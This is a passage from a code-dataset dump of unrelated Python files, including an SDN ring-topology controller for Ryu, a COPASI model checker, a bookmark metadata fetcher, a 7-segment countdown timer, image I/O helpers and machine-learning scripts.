interp_phase_wo_notch(f)\n gamma_cav_phase = interp_phase(f) - del_phase_line\n\n return gamma_cav_mag, gamma_cav_phase\n\n# interp_mag = interp1d(f, deconvolved_mag, kind='cubic')\n# interp_sig_mag = interp1d(f, deconvolved_sig_mag, kind='cubic')\n# interp_phase = interp1d(f, deconvolved_phase, kind='cubic')\n#\n\ndef 
calculate_coupling(gamma_mag_fo, gamma_phase_fo):\n    beta = (1+np.sign(gamma_phase_fo - np.pi)*np.abs(gamma_mag_fo))/(1-np.sign(gamma_phase_fo - np.pi)*np.abs(gamma_mag_fo))\n    return beta\n\n\n","sub_path":"source/reflection_fit_module.py","file_name":"reflection_fit_module.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"633334950","text":"#!/usr/bin/python\nimport time\nimport datetime\nfrom Adafruit_LED_Backpack import SevenSegment\n\nsegment = SevenSegment.SevenSegment(address=0x70)\n# Continually update the time on a 4 char, 7-segment display\nsegment.begin()\n\n\ndef countdown(t):\n    segment.clear()\n    while t:\n        mins, secs = divmod(t, 60)\n        time.sleep(1)\n        t -= 1\n        segment.set_digit(0, int(mins / 10)) # Tens\n        segment.set_digit(1, mins % 10) # Ones\n        # Set minutes\n        segment.set_digit(2, int(secs / 10)) # Tens\n        segment.set_digit(3, secs % 10) # Ones\n        # Toggle colon\n        segment.set_colon(secs % 2) # Toggle colon at 1Hz\n        # Write the display buffer to the hardware. This must be called to\n        # update the actual display LEDs.\n        segment.write_display()\n\n        # Wait a quarter second (less than 1 second to prevent colon blinking getting$\n        # time.sleep(0.25)\n\n    print('Fire in the hole!')\n\nt = 120 # in seconds\ncountdown(t)\n","sub_path":"crowpie/time_bomb.py","file_name":"time_bomb.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"128404889","text":"from ryu.base import app_manager\r\nfrom ryu.controller import ofp_event\r\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER\r\nfrom ryu.controller.handler import set_ev_cls\r\nfrom ryu.ofproto import ofproto_v1_3\r\nfrom ryu.lib.packet import packet\r\nfrom ryu.lib.packet import ethernet, ether_types\r\nfrom ryu.lib.packet import arp\r\nfrom ryu.topology import event, switches\r\nfrom ryu.topology.api import get_switch, get_link, get_all_host\r\n\r\n\r\nrouting_matrix = []\r\ntopoOk = False\r\nhostOk = False\r\ni = 0\r\n\r\n\r\nclass switch(app_manager.RyuApp):\r\n    OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\r\n\r\n    def __init__(self, *args, **kwargs):\r\n        super(switch, self).__init__(*args, **kwargs)\r\n\r\n    # Perform topology discovery of links and switches\r\n    @set_ev_cls(event.EventSwitchEnter)\r\n    def get_topology_data(self, ev):\r\n        switch_list = get_switch(self, None)\r\n        switches = [switch.dp.id for switch in switch_list]\r\n        links_list = get_link(self, None)\r\n        links = [(link.src.dpid, link.dst.dpid, link.src.port_no) for link in links_list]\r\n        print(\"\\n---------------------\")\r\n        print(\"Added switch id => \"),\r\n        print(switch.dp.id)\r\n        print(\"link status => \"),\r\n        print(links)\r\n        print(\"---------------------\\n\")\r\n        global routing_matrix\r\n        global topoOk\r\n        if not topoOk and isRing(switches, links):\r\n            # routing_matrix = []\r\n            for sw in switches:\r\n                sw_links = [link for link in links if link[0] == sw]\r\n                # sw_links[0][0] is equal to sw\r\n                sw_ccw = [x for x in routing_matrix if\r\n                          sw == x.id_cw] # look for an already saved sw (ccw with respect to me)\r\n                sw_cw = [x for x in routing_matrix if sw == x.id_ccw] # also look in the other direction\r\n                if sw_ccw: # check whether a switch with my id as its id_cw is already saved\r\n                    if sw_ccw[0].id == sw_links[0][1]:\r\n                        routing_matrix.append(\r\n                            ringNode(sw, sw_links[1][1], sw_links[0][1], sw_links[1][2], 
sw_links[0][2], \"\", \"\", 0))\r\n\r\n else: # altrimenti e' il contrario\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[0][1], sw_links[1][1], sw_links[0][2], sw_links[1][2], \"\", \"\", 0))\r\n\r\n elif sw_cw:\r\n if sw_cw[0].id == sw_links[0][1]:\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[0][1], sw_links[1][1], sw_links[0][2], sw_links[1][2], \"\", \"\", 0))\r\n else:\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[1][1], sw_links[0][1], sw_links[1][2], sw_links[0][2], \"\", \"\", 0))\r\n else: # se non ho trovato altro allora e' nuovo\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[0][1], sw_links[1][1], sw_links[0][2], sw_links[1][2], \"\", \"\", 0))\r\n topoOk = True\r\n print(\"\\n---------------------\\nRouting Matrix Completed\\n\")\r\n printMat(routing_matrix)\r\n print(\"---------------------\\n\")\r\n\r\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\r\n def switch_features_handler(self, ev):\r\n datapath = ev.msg.datapath\r\n ofproto = datapath.ofproto\r\n parser = datapath.ofproto_parser\r\n\r\n # installiamo la default miss entry\r\n match = parser.OFPMatch()\r\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER, ofproto.OFPCML_NO_BUFFER)]\r\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]\r\n mod = parser.OFPFlowMod(datapath=datapath, priority=0, match=match, instructions=inst)\r\n datapath.send_msg(mod)\r\n\r\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\r\n def packet_in_handler(self, ev):\r\n msg = ev.msg\r\n datapath = msg.datapath\r\n ofproto = datapath.ofproto\r\n parser = datapath.ofproto_parser\r\n in_port = msg.match['in_port']\r\n dpid = datapath.id\r\n pkt = packet.Packet(msg.data)\r\n eth = pkt.get_protocol(ethernet.ethernet)\r\n arp_in = pkt.get_protocol(arp.arp)\r\n\r\n # installo le tabelle dopo aver acquisito tutti gli host\r\n global hostOk\r\n global routing_matrix\r\n sw = [x for x in routing_matrix if x.id == dpid]\r\n sw_obj = sw[0]\r\n if hostOk and not sw_obj.installed: # and non ho ancora installato la tabella su dpid\r\n\r\n # prendendo i riferimenti dall'oggetto switch che matcha l'id compilo flow e group tables\r\n # poi set flag di avvenuta installazione (cosi la prossima volta evito di reinstallare)\r\n self.group_mod(datapath, sw_obj.port_cw, sw_obj.port_ccw)\r\n self.flow_mod(datapath, sw_obj)\r\n\r\n # set flag di installazione avvenuta\r\n idx = 0\r\n for s in routing_matrix:\r\n if s.id == sw_obj.id:\r\n routing_matrix[idx].installed = 1\r\n break\r\n idx += 1\r\n\r\n print(\"\\n---------------------\")\r\n print(\"Tables installed on switch\", dpid)\r\n print(\"---------------------\\n\")\r\n\r\n # gestione centralizzata arp\r\n if arp_in is not None:\r\n assert arp_in.opcode == arp.ARP_REQUEST\r\n print(\"\\n---------------------\")\r\n print(\"ARP packet from DP id-> \", dpid, \"SRC mac->\",eth.src)\r\n print(\"---------------------\\n\")\r\n destination_host_mac = None\r\n host_list = get_all_host(self)\r\n for host in host_list:\r\n if arp_in.dst_ip in host.ipv4:\r\n destination_host_mac = host.mac\r\n break\r\n\r\n # aggiungo host a routing matrix\r\n global i\r\n # if i < len(routing_matrix):\r\n if i < 3:\r\n for host in host_list:\r\n for sw in routing_matrix:\r\n if host.port.dpid == sw.id and sw.host_mac is \"\":\r\n sw.host_mac = host.mac\r\n sw.host_port = int(host.port.name[-1])\r\n i += 1\r\n\r\n # elif not hostOk and i == len(routing_matrix):\r\n elif not hostOk and i == 3:\r\n hostOk = True\r\n 
print(\"\\n---------------------\")\r\n print(\"Discover all hosts\")\r\n printMat(routing_matrix)\r\n print(\"---------------------\\n\")\r\n\r\n # host non trovato\r\n if destination_host_mac is None:\r\n return\r\n pkt_out = packet.Packet()\r\n eth_out = ethernet.ethernet(\r\n dst=eth.src,\r\n src=destination_host_mac,\r\n ethertype=ether_types.ETH_TYPE_ARP\r\n )\r\n arp_out = arp.arp(\r\n opcode=arp.ARP_REPLY,\r\n src_mac=destination_host_mac,\r\n src_ip=arp_in.dst_ip,\r\n dst_mac=arp_in.src_mac,\r\n dst_ip=arp_in.src_ip\r\n )\r\n pkt_out.add_protocol(eth_out)\r\n pkt_out.add_protocol(arp_out)\r\n pkt_out.serialize()\r\n actions = [\r\n parser.OFPActionOutput(\r\n in_port\r\n )\r\n ]\r\n out = parser.OFPPacketOut(\r\n datapath=datapath,\r\n buffer_id=ofproto.OFP_NO_BUFFER,\r\n in_port=ofproto.OFPP_CONTROLLER,\r\n actions=actions,\r\n data=pkt_out.data\r\n )\r\n datapath.send_msg(out)\r\n\r\n else:\r\n return\r\n\r\n # definisco la funzione che compila la flow table\r\n def flow_mod(self, datapath, sw):\r\n ofp = datapath.ofproto\r\n ofp_parser = datapath.ofproto_parser\r\n table_id = 0\r\n\r\n # inoltro da porta cw\r\n match = ofp_parser.OFPMatch(in_port=sw.port_ccw)\r\n actions = [ofp_parser.OFPActionGroup(1)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req2 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=1, match=match, instructions=inst)\r\n datapath.send_msg(req2)\r\n\r\n # inoltro da porta ccw\r\n match = ofp_parser.OFPMatch(in_port=sw.port_cw)\r\n actions = [ofp_parser.OFPActionOutput(sw.port_ccw)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req3 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=1, match=match, instructions=inst)\r\n datapath.send_msg(req3)\r\n\r\n if sw.host_mac is not \"\":\r\n # inoltro all'host\r\n match = ofp_parser.OFPMatch(eth_dst=sw.host_mac)\r\n actions = [ofp_parser.OFPActionOutput(sw.host_port)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req1 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=3, match=match, instructions=inst)\r\n datapath.send_msg(req1)\r\n\r\n # inoltro da porta host\r\n match = ofp_parser.OFPMatch(in_port=sw.host_port)\r\n actions = [ofp_parser.OFPActionGroup(2)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req4 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=1, match=match, instructions=inst)\r\n datapath.send_msg(req4)\r\n\r\n # manda ARP al controllore\r\n match = ofp_parser.OFPMatch(in_port=sw.host_port, eth_type=0x0806)\r\n actions = [ofp_parser.OFPActionOutput(ofp.OFPP_CONTROLLER, ofp.OFPCML_NO_BUFFER)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\r\n req5 = ofp_parser.OFPFlowMod(datapath=datapath, priority=2, match=match, instructions=inst)\r\n datapath.send_msg(req5)\r\n\r\n # definisco la funzione che compila la group table\r\n def group_mod(self, datapath, cw, ccw):\r\n ofp = datapath.ofproto\r\n ofp_parser = datapath.ofproto_parser\r\n\r\n # group id che gestisce i pacchetti in senso orario\r\n actions_norm = [ofp_parser.OFPActionOutput(cw)]\r\n actions_fault = [ofp_parser.OFPActionOutput(ofp.OFPP_IN_PORT)]\r\n buckets_1 = [ofp_parser.OFPBucket(watch_port=cw, actions=actions_norm),\r\n ofp_parser.OFPBucket(watch_port=ccw, actions=actions_fault)]\r\n req_1 = ofp_parser.OFPGroupMod(datapath, ofp.OFPGC_ADD,\r\n ofp.OFPGT_FF, 
group_id=1, buckets=buckets_1)\r\n        datapath.send_msg(req_1)\r\n\r\n        # group id that handles packets from the host\r\n        actions_fault_host = [ofp_parser.OFPActionOutput(ccw)]\r\n        buckets_2 = [ofp_parser.OFPBucket(watch_port=cw, actions=actions_norm),\r\n                     ofp_parser.OFPBucket(watch_port=ccw, actions=actions_fault_host)]\r\n        req_2 = ofp_parser.OFPGroupMod(datapath, ofp.OFPGC_ADD,\r\n                                       ofp.OFPGT_FF, group_id=2, buckets=buckets_2)\r\n        datapath.send_msg(req_2)\r\n\r\n\r\nclass ringNode(object):\r\n    id = \"\"\r\n    id_cw = \"\"\r\n    id_ccw = \"\"\r\n    port_cw = \"\"\r\n    port_ccw = \"\"\r\n    host_port = \"\"\r\n    host_mac = \"\"\r\n    installed = \"\"\r\n\r\n    # The class \"constructor\" - It's actually an initializer\r\n    def __init__(self, id, id_cw, id_ccw, port_cw, port_ccw, host_port, host_mac, installed):\r\n        self.id = id\r\n        self.id_cw = id_cw\r\n        self.id_ccw = id_ccw\r\n        self.port_cw = port_cw\r\n        self.port_ccw = port_ccw\r\n        self.host_port = host_port\r\n        self.host_mac = host_mac\r\n        self.installed = installed\r\n\r\n\r\ndef printMat(mat):\r\n    for sw in mat:\r\n        print(\"id:\"),\r\n        print(sw.id),\r\n        print(\" id_cw:\"),\r\n        print(sw.id_cw),\r\n        print(\" id_ccw:\"),\r\n        print(sw.id_ccw),\r\n        print(\" port_cw:\"),\r\n        print(sw.port_cw),\r\n        print(\" port_ccw:\"),\r\n        print(sw.port_ccw)\r\n        print(\" host_port:\"),\r\n        print(sw.host_port)\r\n        print(\" host_mac:\"),\r\n        print(sw.host_mac)\r\n        print(\" installed:\"),\r\n        print(sw.installed)\r\n\r\n\r\ndef isRing(switches, links):\r\n    for sw in switches:\r\n        sw_links = [x for x in links if x[0] == sw]\r\n        if len(sw_links) < 2 or not [x for x in sw_links for y in links if x[1] == y[0]]:\r\n            return False\r\n    return True","sub_path":"final_controller.py","file_name":"final_controller.py","file_ext":"py","file_size_in_byte":12918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"408055718","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2018 Piero Dalle Pezze\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport logging\nimport sys\nimport os\n\nfrom sbpipe.utils.io import write_mat_on_file\n\nif sys.version_info > (3,):\n import importlib\n COPASI_loader = importlib.util.find_spec('COPASI')\n found = COPASI_loader is not None\nelse:\n import imp\n try:\n imp.find_module('COPASI')\n found = True\n except ImportError:\n found = False\n\nif found:\n import COPASI\n\n\nlogger = logging.getLogger('sbpipe')\n\n\ndef copasi_model_checking(model_filename, fileout, task_name=\"\"):\n \"\"\"\n Perform a basic model checking for a COPASI model file.\n\n :param model_filename: the filename to a COPASI file\n :param fileout: the file containing the model checking results\n :param task_name: the task to check\n :return: a boolean indicating whether the model could be loaded successfully\n \"\"\"\n\n try:\n data_model = COPASI.CCopasiRootContainer.addDatamodel()\n except:\n data_model = COPASI.CRootContainer.addDatamodel()\n\n # clear previous log messages\n COPASI.CCopasiMessage.clearDeque()\n\n outcome = []\n\n # list of checks\n if not check_model_loading(model_filename, data_model):\n outcome.append('model loading\\tERROR')\n write_mat_on_file(fileout, outcome)\n return False\n else:\n outcome.append('model loading\\tPASS')\n\n if not check_task_selection(model_filename, task_name, data_model):\n outcome.append('task selection\\tERROR')\n write_mat_on_file(fileout, outcome)\n return False\n else:\n outcome.append('task selection\\tPASS')\n\n write_mat_on_file(fileout, outcome)\n return True\n\n\ndef severity2string(severity):\n \"\"\"\n Return a string representing the severity of the error message\n :param severity: an integer representing severity\n :return: a string of the error message\n \"\"\"\n\n return {\n\n COPASI.CCopasiMessage.RAW: \"RAW\",\n COPASI.CCopasiMessage.TRACE: \"TRACE\",\n COPASI.CCopasiMessage.COMMANDLINE: \"COMMANDLINE\",\n COPASI.CCopasiMessage.WARNING: \"WARNING\",\n COPASI.CCopasiMessage.ERROR: \"ERROR\",\n COPASI.CCopasiMessage.EXCEPTION: \"EXCEPTION\",\n COPASI.CCopasiMessage.RAW_FILTERED: \"RAW_FILTERED\",\n COPASI.CCopasiMessage.TRACE_FILTERED: \"TRACE_FILTERED\",\n COPASI.CCopasiMessage.COMMANDLINE_FILTERED: \"COMMANDLINE_FILTERED\",\n COPASI.CCopasiMessage.WARNING_FILTERED: \"WARNING_FILTERED\",\n COPASI.CCopasiMessage.ERROR_FILTERED: \"ERROR_FILTERED\",\n COPASI.CCopasiMessage.EXCEPTION_FILTERED: \"EXCEPTION_FILTERED\"\n\n }.get(severity, COPASI.CCopasiMessage.RAW)\n\n\ndef check_model_loading(model_filename, data_model):\n \"\"\"\n Check whether the COPASI model can be loaded\n\n :param model_filename: the filename to a COPASI file\n :param data_model: the COPASI data model structure\n :return: a boolean indicating whether the model could be loaded successfully\n \"\"\"\n\n # check whether the model cannot be loaded\n if not data_model.loadModel(model_filename):\n logger.error('The model cannot be loaded into COPASI and has serious issues')\n logger.error(COPASI.CCopasiMessage.getAllMessageText())\n return False\n\n # the model could be loaded fine, but we could still print possible warnings\n if COPASI.CCopasiMessage.size() > 1:\n logger.warning('The highest error severity encountered was: {0}'.\n format(severity2string(COPASI.CCopasiMessage.getHighestSeverity())))\n 
logger.warning(COPASI.CCopasiMessage.getAllMessageText())\n else:\n logger.info('The model can be loaded without any apparent issues')\n\n return True\n\n\ndef check_task_selection(model_filename, task_name, data_model):\n \"\"\"\n Check whether the COPASI model task can be executed\n\n :param model_filename: the filename to a COPASI file\n :param task_name: the task to check\n :param data_model: the COPASI data model structure.\n :return: a boolean indicating whether the model task can be executed correctly\n \"\"\"\n\n # MODEL TASK\n if task_name:\n task = data_model.getTask(task_name)\n\n # check whether no task was selected\n if task is None:\n logger.error('No task with name `{0}` was found'.format(task_name))\n return False\n\n # check whether the task is scheduled, otherwise it will not run from CopasiSE\n logger.debug('Task `{0}` is {1}'.format(task_name,\n \"scheduled\" if task.isScheduled() else \"not scheduled\"))\n\n # check whether the task cannot be initialized\n if not task.initialize(COPASI.CCopasiTask.OUTPUT_UI):\n logger.error('COPASI task `{0}` cannot be initialised'.format(task_name))\n task.process(True)\n logger.error(task.getProcessError())\n return False\n\n if not check_task_report(model_filename, task_name, data_model, task):\n return False\n\n return True\n\n\ndef check_task_report(model_filename, task_name, data_model, task):\n \"\"\"\n Check whether the COPASI model task can be executed\n\n :param model_filename: the filename to a COPASI file\n :param task_name: the task to check\n :param data_model: the COPASI data model structure\n :param task: the COPASI task data structure\n :return: a boolean indicating whether the model task can be executed correctly\n \"\"\"\n\n report_filename = task.getReport().getTarget()\n\n # check whether a report was not configured\n if not report_filename:\n logger.error('No report was configured for COPASI task `{0}`'.format(task_name))\n return False\n\n # check whether the report name is different from the model name\n model_name = os.path.splitext(os.path.basename(model_filename))[0]\n report_name = os.path.splitext(os.path.basename(report_filename))[0]\n report_ext = os.path.splitext(os.path.basename(report_filename))[1]\n change_report_name = False\n change_report_ext = False\n if model_name != report_name:\n logger.warning('The report filename differs from the model name.')\n report_name = model_name\n change_report_name = True\n if report_ext not in {'.csv', '.txt', '.tsv', '.dat'}:\n logger.warning('The report extension must be one of the following: .csv, .txt, .tsv, or .dat')\n report_ext = '.csv'\n change_report_ext = True\n if change_report_name or change_report_ext:\n logger.warning('SBpipe will update the report file name to `{0}{1}`'.format(report_name, report_ext))\n task.getReport().setTarget(report_name + report_ext)\n task.getReport().setAppend(False)\n # save the model to a COPASI file\n data_model.saveModel(model_filename, True)\n\n # dunno why this is generated.. 
it seems a bug in Copasi to me..\n    fake_report = os.path.join(os.path.dirname(model_filename), report_filename)\n    if os.path.exists(fake_report):\n        os.remove(fake_report)\n\n    logger.info('COPASI task `{0}` can be executed'.format(task_name))\n\n    return True\n\n","sub_path":"sbpipe/simul/copasi/model_checking.py","file_name":"model_checking.py","file_ext":"py","file_size_in_byte":8146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"647506784","text":"import urllib2\nfrom urlparse import urljoin\nfrom BeautifulSoup import BeautifulSoup\nfrom redis import Redis\nimport json\nimport threading\n\nimport settings\nfrom models import Link\n\n\nclass RedisSubscriber(threading.Thread):\n    def __init__(self):\n        threading.Thread.__init__(self)\n        self.redis = Redis(host=settings.REDIS_HOST, port=settings.REDIS_PORT, db=settings.REDIS_DB_NO)\n        self.pubsub = self.redis.pubsub()\n        self.pubsub.subscribe(settings.REDIS_QUEUE_NAME)\n\n    def run(self):\n        for item in self.pubsub.listen():\n            if item['channel'] == settings.REDIS_QUEUE_NAME and item['type'] == 'message':\n                self.on_message(item['data'])\n\n    def on_message(self, data):\n        try:\n            obj = json.loads(data)\n            fetch_page(obj['link_id'])\n        except:\n            pass\n\n\ndef fetch_page(link_id):\n    link = Link.objects.get(pk=link_id)\n    url = link.url\n\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}\n    req = urllib2.Request(url, None, headers)\n\n    try:\n        html = urllib2.urlopen(req).read()\n        soup = BeautifulSoup(html)\n        link.title = soup.find('title').text\n\n        favicon = soup.find('link', rel='shortcut icon')\n        if favicon and favicon['href']:\n            link.favicon = urljoin(url, favicon['href'])\n\n        for item in soup.findAll('meta'):\n            if item.get('name', '').lower() in ('description', 'og:description') and item.get('content', ''):\n                link.description = item.get('content', '')\n\n    except Exception as e:\n        link.is_error = 1\n        link.error_text = str(e)\n\n    link.save()\n","sub_path":"BookmarkService/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"375768808","text":"import pandas as pd\nimport numpy as np\n\n\nclass SimilarityIndex():\n\n    def __init__(self):\n        self.similarity_df = None\n\n    def calculate_similarity_between(self, mass_spectrum1, mass_spectrum2):\n        nominator = np.sum(np.dot(mass_spectrum1, mass_spectrum2))\n        ms1_sq, ms2_sq = np.dot(mass_spectrum1, mass_spectrum1), np.dot(mass_spectrum2, mass_spectrum2)\n        denominator = np.sqrt(np.sum(ms1_sq) * np.sum(ms2_sq))\n        return nominator/denominator\n\n    def create_similarity_data_frame(self, columns, data_point_dict, ref_spectra):\n        similarity_df = pd.DataFrame(columns=columns)\n        function = self.calculate_similarity_between\n        for k, v in data_point_dict.items():\n            similarity_df.loc[k] = [function(v, ref_spectrum) for ref_spectrum in ref_spectra]\n        self.similarity_df = similarity_df\n        return similarity_df\n","sub_path":"mstools/metrics/SimilarityIndex.py","file_name":"SimilarityIndex.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"386225128","text":"from numpy import genfromtxt\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\ndef find_best():\n    results = []\n    best = 0\n    for k in range(1, 10):\n        for p in range(1, 3):\n            neigh = 
KNeighborsClassifier(n_neighbors=k, p=p)\n neigh.fit(train_x, train_y)\n pred = neigh.predict(test_x)\n # without using sklearn.metrics.accuracy_score\n count = 0\n for j in range(pred.size):\n if pred[j] == test_y[j]:\n count += 1\n if count > best:\n best = count\n results.append((k, p, count))\n print(results)\n print(\"Finding best configurations of k and p for\", test_x_name)\n for i in range(len(results)):\n if results[i][2] == best:\n print(\"k =\", results[i][0], \"and p =\", results[i][1])\n return results\n\n\nfor i in range(1, 4):\n if i == 1:\n train_x_name = '../data/data_x_tr.csv'\n train_y_name = '../data/data_y_tr.csv'\n test_x_name = '../data/data_x_tst.csv'\n test_y_name = '../data/data_y_tst.csv'\n else:\n train_x_name = '../data/data' + str(i) + '_x_tr.csv'\n train_y_name = '../data/data' + str(i) + '_y_tr.csv'\n test_x_name = '../data/data' + str(i) + '_x_tst.csv'\n test_y_name = '../data/data' + str(i) + '_y_tst.csv'\n train_x = genfromtxt(train_x_name, delimiter=',')\n train_y = genfromtxt(train_y_name, delimiter=',')\n test_x = genfromtxt(test_x_name, delimiter=',')\n test_y = genfromtxt(test_y_name, delimiter=',')\n find_best()\n","sub_path":"HW2/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"49161914","text":"# Author: Stephen Timmel\n# stimmel@vt.edu\n# Not for external distribution.\n\n#internal image layout: img[row][column][rgb]\n#sample usage: img[5][5]['r']\n\nimport struct\n\ndef save_ppm_image_8(filename,img):\n f = open(filename,'w');\n\n #write ppm header\n width = len(img[0])\n height = len(img)\n f.write('P6 ' + str(width) + ' ' + str(height) + ' ' + '255' + '\\n')\n\n for row in img:\n for pixel in row:\n red = struct.pack('@B',pixel['r'])\n green = struct.pack('@B',pixel['g'])\n blue = struct.pack('@B',pixel['b'])\n f.write(red + green + blue)\n f.close()\n\ndef load_ppm_image_8(filename):\n f = open(filename,'rb');\n\n #read ppm header\n header = f.readline().replace('\\n','').split(' ')\n\n #validate header\n assert len(header) == 4, \"Incorrect PPM8 header length\" \n assert header[0] == 'P6', \"Incorrect PPM8 file format. Must be P6\" \n assert header[1].isdigit(), \"Incorrect PPM8 width. Must be numeric\" \n assert header[2].isdigit(), \"Incorrect PPM8 height. Must be numeric\" \n assert header[3].isdigit(), \"Incorrect PPM8 color depth. Must be numeric\"\n assert header[3] == '255', \"Incorrect PPM8 color depth. 
Must be 255\"\n\n #save width and height for later\n width = int(header[1])\n height = int(header[2])\n \n #pull file into an array, three bytes at a time\n img = []\n for h in range(height):\n img.append([])\n for w in range(width):\n img[h].append({})\n data = f.read(3)\n img[h][w]['r'] = int(struct.unpack_from('@B',data,0)[0])\n img[h][w]['g'] = int(struct.unpack_from('@B',data,1)[0])\n img[h][w]['b'] = int(struct.unpack_from('@B',data,2)[0])\n\n f.close()\n return img\n\ndef save_pgm_image_8(filename,img):\n f = open(filename,'w');\n\n #write ppm header\n width = len(img[0])\n height = len(img)\n f.write('P5 ' + str(width) + ' ' + str(height) + ' ' + '255' + '\\n')\n\n for row in img:\n for pixel in row:\n shade = struct.pack('@B',pixel)\n f.write(shade)\n f.close()\n\ndef load_pgm_image_8(filename):\n f = open(filename,'rb');\n\n #read ppm header\n header = f.readline().replace('\\n','').split(' ')\n\n #validate header\n assert len(header) == 4, \"Incorrect PGM8 header length\" \n assert header[0] == 'P5', \"Incorrect PGM8 file format. Must be P5\" \n assert header[1].isdigit(), \"Incorrect PGM8 width. Must be numeric\" \n assert header[2].isdigit(), \"Incorrect PGM8 height. Must be numeric\" \n assert header[3].isdigit(), \"Incorrect PGM8 color depth. Must be numeric\"\n assert header[3] == '255', \"Incorrect PGM8 color depth. Must be 255\"\n\n #save width and height for later\n width = int(header[1])\n height = int(header[2])\n \n #pull file into an array, three bytes at a time\n img = []\n for h in range(height):\n img.append([])\n for w in range(width):\n data = f.read(1)\n img[h].append(int(struct.unpack('@B',data)[0]))\n\n f.close()\n return img\n","sub_path":"projects/proj01/code/scripts/pam_io.py","file_name":"pam_io.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70319142","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\n\"\"\"\nPrect the model described in:\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport inspect,codecs,sys,os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nbase_path = os.path.dirname(__file__);\nsys.path.append(os.path.join(base_path,'.'));\n\nfrom djl_model_lstm import PTBInput\nfrom djl_model_lstm import PTBModel\nfrom config import get_prect_config as config\nimport djl_reader as reader\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\n \"model\", \"small\",\n \"A type of model. 
Possible options are: small, medium, large.\")\n\nflags.DEFINE_string(\"vocab_path\", None,\n \"Where the vocab data is stored.\")\n\nflags.DEFINE_string(\"test_path\", None,\n \"Where the test data is stored.\")\nflags.DEFINE_string(\"save_path\", None,\n \"Model output directory.\")\nflags.DEFINE_bool(\"use_fp16\", False,\n \"Train using 16-bit floats instead of 32bit floats\")\n\nFLAGS = flags.FLAGS\n\n\nsys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout)\ndef data_type():\n\treturn tf.float16 if FLAGS.use_fp16 else tf.float32\n\ndef run_epoch(session, model,id_to_word = None, eval_op=None, verbose=False):\n\t\"\"\"Runs the model on the given data.\"\"\"\n\tstart_time = time.time()\n\tcosts = 0.0\n\titers = 0\n\tstate = session.run(model.initial_state)\n\n\tfetches = {\n\t\t\"softmax_w\": model.softmax_w,\n\t\t\"output\": model.output,\n\t\t\"logits\": model.logits,\n\t\t\"targets\": model.targets,\n\t\t\"input\": model.input.input_data,\n\t\t\"cost\": 